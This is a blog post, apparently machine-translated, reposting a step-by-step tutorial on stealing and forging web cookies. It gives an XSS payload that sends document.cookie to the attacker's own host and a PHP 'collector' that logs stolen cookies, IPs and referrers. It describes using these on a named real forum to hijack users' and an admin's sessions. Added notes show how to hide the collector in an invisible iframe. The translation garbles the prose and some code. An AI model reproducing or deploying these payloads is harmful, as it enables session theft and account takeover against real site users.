Friday, June 22, 2007

Dangers Of Non Microwave




Cookie Poisoning By
SkapperMX



are cookies? ?

A cookie is a piece of information that is stored in the visitor's hard drive of a web page through your browser

, at the request of the page server. This information can then be retrieved by the server

on subsequent visits. The invented Lou Montulli, a former employee of Netscape Communications. As the HTTP protocol

unable to maintain information by itself, so you can keep information between

page views and over (such as user login, color preferences, etc.), it must be stored in either

the URL of the page on the server itself, or in a cookie on the visitor's computer.

Thus, the most common uses of cookies are:

* Keeping track of users: when a user enters their username and password

stores a cookie so you do not have to be entered for each page from the server. However

a cookie identifies a person, but a combination of computer and browser.
* Offering designs (colors, backgrounds, etc) or content to the visitor.
* Get information about user's browsing habits, and attempts to spyware,

by advertising agencies and others. This can cause privacy problems and is one of the reasons why the

cookies have their detractors.

originally could only be stored for a CGI request from the server, but Netscape
gave his language ability Javascript
enter them directly from the client, without CGIs. At first,

browser due to errors, this gave some security issues, which were subsequently resolved.

These vulnerabilities were discovered by Esteban Rossi [citation needed]. Cookies can be deleted, accepted or blocked

as desired to configure properly this should only web browser. Theft

cookies


The cross-site scripting allows the value of the cookie is sent to servers that do not normally receive such information

. Modern browsers allow execution of code segments received from the server.

If cookies are accessible during execution, its value can be reported somehow

servers should not access them. The process that allows an unauthorized party to receive a cookie called cookies

theft, and the Encryption does not work against this type of attack.




cookies
Counterfeiting

Although cookies must be stored and sent back to the server unchanged, an attacker could

change the value of cookies before returning. If, for example, a cookie contains the total value of the

purchase of a user on a web site, changing the value the server could allow an attacker to pay less than

due on your purchase. The process of modifying the value of the cookies are called cookies counterfeit

and often is made after theft of cookies to persistent attack.

However, most web sites only store in a session ID cookie-

a unique number used to identify the user's session, and the rest of the information is stored on the server itself.

In this case, the problem of counterfeiting of cookies is virtually eliminated.

Source: Wikipedia.com



******************************************* ************************************************** ************************************************** *********************** *************************

Welcome

******************************************** my second tutorial, this book will see and keys out real examples to make a forgery

cookie or cookie poisoning.No I am responsible to partial damage to sites with this information ... For this tutorial

nesesitas various tools:

-

FlashFXP Download - Mozilla Firefox Download

**************************** ************************************************** ************************************************** *******************************************

************************************************ ************************






Stage 1 Preparation Tools



remember XSS vulnerability?? well-known attack that can make a good cookie stealer script

see the script which is the following code


Code: 

 
 \u0026lt;script> self.location.href = 'http://misitio .com / log.php? c = '+ escape (document.cookie) \u0026lt;/ script>


analyzed the code for parts


Code:
\u0026lt;script>
declare here that the server is a script

Code: 
 self.location.href

This is a command Javascript to redirect the web to our site


Code: 
 + escape (document.cookie);

This is where it is important as it is stated here that we want the variable C is the current cookie


Code:
\u0026lt;/ script>


close our script we already have our code ok cookie stealer and now as we keep the cookie??

simply with this code in php it does is to capture all data sent (the script) and

saved in a file that created in this code in php will call

sensor
Code: 

 
 \u0026lt;? 
 php $ file = fopen ('log2.htm', 'a');// Here we can change the file name to create 
 $ cookie = $ _GET [' c '] = $ user 
 $ _GET ['id']; 
 $ ip = getenv ('REMOTE_ADDR'); 
 $ re = $ HTTPREFERRER; 
 
 $ date = date ("j F, Y, g: ia"); 
 fwrite ($ file '\u0026lt;hr> USER AND PASSWORD: '. Base64_decode ($ user). "Facebook Cookie:'. $ Cookie." Facebook page: '. $ Re. "Facebook 
 
 IP:'. $ Ip. '
 Date and Time:'. $ Date. '\u0026lt;/ Hr>'); 
 fclose ($ file); 
?>



As you can see there is no big deal, ok we have our tools and how to launch the attack?
in this way.

There are 3 steps to get a perfect fit which are: 1 .-

Find a website that has any XSS vulnerability
2 .- Find some free host and upload our privileged cookie sensor 777.
3 .- Inject our code (script)
4 .- After days see our sensor and fake cookies


Create a free hosting BolHost.com or other free hosting site that supports PHP.


climbed all our hosting via FTP or manually in the web

We

privileges 777 to our sensor



Get Ready for the attack ......




Stage 2 Injection and Theft



will attack the following website with a XSS bug in some post



tested the test script xss y. ..





As we see it is vulnerable to XSS, now inject our code stealer cookies ..



And we should redirect to our website the cookie rabandonos inmediantamente ...



Let our collector .... We Cookies !!!!!!!



And now I .......... Flasificamos cookies.

************************************************ ************************************************** *************
PD. I will use Firefox to fake the cookie because I feel more comfortable with the ...
'll use the following plugin.
is called Cookie Editor can be downloaded here: Here

*********************************** ************************************************** ************************* Stage 3




Cookie Poisoning

Open the Mozilla plugin and install our dear ...



Ok, install our plugin, we headed our hosting (where we have our friend the collector of cookies) ...

I downloaded ....................



And we see a lot of letters ...



remember that the attack was www.teambio.net web, let 's see ...



As you can see their eyes this is a forum for the company Vbulleti $, as we all know are hard to find a vulnerability
, but I found this in one day did not know where to go to this website and

post a topic but I thought if you were getting into our beloved TEST XSS script in a post that would happen .. I tried and

vuala! I get an alert message, then injected into I post the script to steal cookies and

two or three days of waiting I had my beautiful cookies and guess what the manager also!.
When
that excites me and I saw a Cookie Poisoning fast. Let my experience .. newbies aside.


And as enveneraremos?? pss very simple to enter our website to attack which in our case enter
TeamBio




Now we checked and we loguemos as a normal user, but remember that we have to put the box "Always Remember" for the cookie to be sent to our computer so we can create and modify to our liking



Now see our cookie generated from the website of TeamBio



As we have some letters, if you compare it with data obtained by observing that your cookies are almost equal

only for certain data ..




Now we open our beloved Firefox and select the Tools Cookie Editor,

now have all the cookies stored on your computer by other sites, look at the word filter team (for teambio)

y. ..



Now we know all data that are in nuetras cookies, now I just change the information in our cookie
original
for some we capture all the data with information combies Nama, clicking on any of the parties and then Edit





visit our website now and ... We loguedo as another user!



This concludes my second tutorial, I hope you have enjoyed and understood.

PD. Maybe the sample site and is not vulnerable to these attacks ....


*********************************************** ************************************************** ********************************************* -= Team =-
UnderCode

SkapperMX "You're nobody in life until you do something special ..."


SkapperMX at gmail dot com
Skapper_MX at hotmail dot com


blogger Notes:

  • 1) There is an error in the script to the collector, you must be well
    self.location \u0026lt;script> . href = 'http://misitio.com/captador.php?c =' + escape (document.cookie) \u0026lt;/ script>.

  • 2) For local servers, the configuration of the permit must be CHMOD 777

  • 3) You can use the iframe tag to camouflage the pickup page ...

    \u0026lt;iframe 
     
     src="http://[server]/xss.html" height="1" width="1" frameborder="0"> \u0026lt;/ iframe> 
     



     
     \u0026lt;! - script.js -!> 
     \u0026lt;script> 
     self.location.href = 'http:// [server] /? c =' + escape (document.cookie); 
     \u0026lt;/ script > 
     



     


     
     \u0026lt;? 
     php / / index.php 
     $ file = fopen ('log2.htm', 'a');// Here we can change the file name create 
     $ cookie = $ _GET ['c']; 
     $ user = $ _GET ['id']; 
     $ ip = getenv ('REMOTE_ADDR'); 
     $ re = $ HTTPREFERRER; 
     
     $ date = date ("j F, Y, g: ia"); 
     fwrite ($ file, '\u0026lt;hr> USER AND PASSWORD:'. base64_decode ($ user). "Facebook Cookie: '. $ cookie." Facebook page:'. $ re. "
     
     
     IP: '. $ ip. "Facebook Date and Time:'. $ date." \u0026lt;/ hr> '); 
     fclose ($ file); 
    ?>


"The knowledge frees us "
Posted by admin at 12:11 PM

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)